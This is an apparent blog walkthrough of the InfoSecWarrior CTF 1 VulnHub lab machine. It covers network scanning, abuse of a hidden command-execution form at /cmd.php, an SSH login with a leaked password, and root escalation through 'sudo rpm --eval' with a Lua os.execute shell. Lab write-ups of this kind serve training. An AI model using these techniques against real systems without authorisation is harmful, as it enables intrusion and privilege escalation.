{"id":25972,"date":"2020-04-08T15:26:35","date_gmt":"2020-04-08T09:56:35","guid":{"rendered":"https:\/\/www.armourinfosec.com\/?p=25972"},"modified":"2020-04-09T18:13:56","modified_gmt":"2020-04-09T12:43:56","slug":"infosecwarrior-ctf-2020-01-walkthrough","status":"publish","type":"post","link":"https:\/\/www.armourinfosec.com\/infosecwarrior-ctf-2020-01-walkthrough\/","title":{"rendered":"InfoSecWarrior CTF: 1 Walkthrough"},"content":{"rendered":"

Here’s a new InfoSecWarrior CTF: 1 Walkthrough<\/strong> for Vulnhub<\/strong> machines. InfoSecWarrior CTF 2020: 01 is the first challenge of Infosec Warrior CTF 2020<\/strong><\/a>. This challenge was created by CyberKnight00 and MAALP1225. You can download here this CTF<\/a>. It states the level is an Easy level and that is true so what. Either way, you explore a little if this is unfamiliar and that’s how you learn. This is the box designed for the beginners and wannabe hackers to cherish their pentesting skills. So, here we go.<\/p>\n

\"InfoSecWarrior<\/h2>\n

Penetration Testing Methodologies<\/h2>\n

Network Scan<\/h4>\n
    \n
  • \u00a0Netdicover<\/li>\n
  • \u00a0Nmap Enumeration<\/li>\n<\/ul>\n

    Enumeration<\/h4>\n
      \n
    • \u00a0Nikto<\/li>\n
    • Password guessing<\/li>\n
    • web enumeration<\/li>\n<\/ul>\n

      Privilege Escalation<\/h4>\n
        \n
      • Capture the Flag.<\/li>\n
      • password<\/li>\n
      • Sudo -l<\/li>\n<\/ul>\n

        Network Scanning<\/h3>\n

        Without wasting much time a star with the obtaining IP address of the box. I use netdiscove<\/strong>r and got the IP 192.168.2.13<\/strong>.<\/p>\n

        #netdiscover -i vboxnet0                                                                                                                                                                                                                                                                                                                  \r\n 2 Captured ARP Req\/Rep packets, from 2 hosts.   Total size: 102                                                                                                                                \r\n _____________________________________________________________________________\r\n   IP            At MAC Address     Count     Len  MAC Vendor \/ Hostname      \r\n -----------------------------------------------------------------------------\r\n 192.168.2.2     08:00:27:b8:05:a6      1      42  PCS Systemtechnik GmbH                                                                                                                       \r\n 192.168.2.13    08:00:27:7a:cd:67      1      60  PCS Systemtechnik GmbH<\/pre>\n
        Let’s proceed with the network scan using\u00a0Nmap<\/strong> aggressive scan as shown below.<\/p>\n
        #nmap -p- -A -sS -sC 192.168.2.13\r\n\r\nStarting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-04-08 12:11 IST\r\nNmap scan report for 192.168.2.13\r\nHost is up (0.00074s latency).\r\nNot shown: 65533 filtered ports\r\nPORT   STATE SERVICE VERSION\r\n22\/tcp open  ssh     OpenSSH 5.3 (protocol 2.0)\r\n| ssh-hostkey: \r\n|   1024 2f:b3:a5:cd:e5:14:33:a1:82:3b:dd:5a:5e:d7:59:36 (DSA)\r\n|_  2048 2d:b4:15:28:36:d8:b5:4e:18:81:8e:af:3e:e4:de:c1 (RSA)\r\n80\/tcp open  http    Apache httpd 2.2.15 ((CentOS))\r\n| http-methods: \r\n|_  Potentially risky methods: TRACE\r\n|_http-server-header: Apache\/2.2.15 (CentOS)\r\n|_http-title: Apache HTTP Server Test Page powered by CentOS\r\nMAC Address: 08:00:27:7A:CD:67 (Oracle VirtualBox virtual NIC)\r\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\r\nRunning: Linux 2.6.X|3.X\r\nOS CPE: cpe:\/o:linux:linux_kernel:2.6 cpe:\/o:linux:linux_kernel:3\r\nOS details: Linux 2.6.32 - 3.10, Linux 2.6.32 - 3.13\r\nNetwork Distance: 1 hop\r\nNmap did: 1 IP address (1 host up) scanned in 164.64 seconds<\/pre>\n
        Enumeration<\/h3>\n
        The first thing we notice is port 80 is open and we see the Apache Test page on the web.<\/p>\n
        \"InfoSecWarrior<\/p>\n
        On further enumeration, I came across a \/note.txt\u00a0<\/strong>as shown below. and nothing important to see here.<\/p>\n
        \"InfoSecWarrior<\/p>\n
        There is the indexing of \/sitemap.xml.\u00a0<\/strong>Which lead to a new page \/index.htnl<\/strong><\/p>\n
        \"sitemap\"<\/p>\n
        The page consists of a gif. So I viewed the page source of the page.<\/p>\n
        \"meme\"<\/p>\n
        <h1>Keep Calm And HACK<\/h1>\r\n<img src=\"hacker.gif\" alt=\"Hacker\" height=\"640\" width=\"1280\"> \r\n<img hidden=\"True\" src=\"minnions.gif\" alt=\"Hackor\" height=\"640\" width=\"1280\">   [here ther is an gif that is hidden ]\r\n<form action = \"\/cmd.php\" hidden=\"True\" method = \"GET\">  [ here there is a form that is hidden ]\r\n command\r\n     <input type = \"text\" name = \"AI\" value = \"\" maxlength = \"100\" \/>\r\n <br \/>\r\n <input type = \"submit\" value =\"Submit\" \/>\r\n<\/form>\r\n<\/pre>\n
        So I change the hidden part of the code and an “id ” command by \/cmd.php\u00a0<\/strong><\/p>\n
        \"inspect\"<\/p>\n
        It worked but not as I respected to be. it gave an error and a clue to use another methodology of HTTP. So I changed the method\u00a0GET\u00a0<\/strong>to\u00a0POST\u00a0<\/strong>for the form.<\/p>\n
        \"id\"<\/p>\n
        Yess I found you.\u00a0 Now I tried to opening\u00a0\/etc\/passwd\/\u00a0<\/strong><\/p>\n
        \"InfoSecWarrior<\/p>\n
        On more enumeration, I open \/cmd.php\u00a0<\/strong>and found the password of the user\u00a0isw0:123456789blabla<\/strong><\/p>\n
         #ssh isw0@192.168.2.13\r\n\r\nThe authenticity of host '192.168.2.13 (192.168.2.13)' can't be established.\r\nRSA key fingerprint is SHA256:rNHlcfJ22Jb4j6wQvLvKK\/+tc9khM8tM3yq9yDiz6dQ.\r\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\r\nWarning: Permanently added '192.168.2.13' (RSA) to the list of known hosts.\r\nisw0@192.168.2.13's password: \r\nLast login: Thu Feb 13 18:41:34 2020 from 192.168.1.56\r\n[isw0@InfosecWarrior ~]$ whoami\r\nisw0\r\n[isw0@InfosecWarrior html]$ id\r\nuid=500(isw0) gid=500(isw0) groups=500(isw0) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023\r\n[isw0@InfosecWarrior html]$ hostname\r\nInfosecWarrior\r\n[isw0@InfosecWarrior ~]$ cat isw0_user \r\ne4408105ca9c2a5c2714a818c475d06e\r\n[isw0@InfosecWarrior ~]$ \r\n<\/pre>\n
        Got the user flag going for the root flag.<\/p>\n
        [isw0@InfosecWarrior ~]$ sudo -l\r\nMatching Defaults entries for isw0 on this host:\r\n    !visiblepw, always_set_home, env_reset, env_keep=\"COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS\", env_keep+=\"MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE\",\r\n    env_keep+=\"LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES\", env_keep+=\"LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE\", env_keep+=\"LC_TIME LC_ALL LANGUAGE LINGUAS\r\n    _XKB_CHARSET XAUTHORITY\", secure_path=\/sbin\\:\/bin\\:\/usr\/sbin\\:\/usr\/bin\r\n\r\nUser isw0 may run the following commands on this host:\r\n    (!root) NOPASSWD: \/bin\/bash\r\n    (root) \/bin\/ping, (root) \/bin\/ping6, (root) \/bin\/rpm, (root) \/bin\/ls, (root) \/bin\/mktemp\r\n[isw0@InfosecWarrior ~]$ sudo bash\r\n[sudo] password for isw0: \r\nSorry, user isw0 is not allowed to execute '\/bin\/bash' as root on InfosecWarrior.\r\n[isw0@InfosecWarrior ~]$ sudo rpm --eval '%{lua:os.execute(\"\/bin\/sh\")}'\r\n[sudo] password for isw0: \r\nsh-4.1# id\r\nuid=0(root) gid=0(root) groups=0(root) context=unconfined_u:system_r:rpm_script_t:s0-s0:c0.c1023\r\nsh-4.1# hostname\r\nInfosecWarrior\r\nsh-4.1# cd\r\nsh-4.1# ls\r\nanaconda-ks.cfg  Armour.sh  flag.txt  install.log  install.log.syslog\r\nsh-4.1# cat flag.txt \r\nfc9c6eb6265921315e7c70aebd22af7e\r\nsh-4.1# exit\r\nexit<\/pre>\n
         <\/p>\n
        Eureka !!!!!! GOT THE FLAG<\/p>\n
         <\/p>\n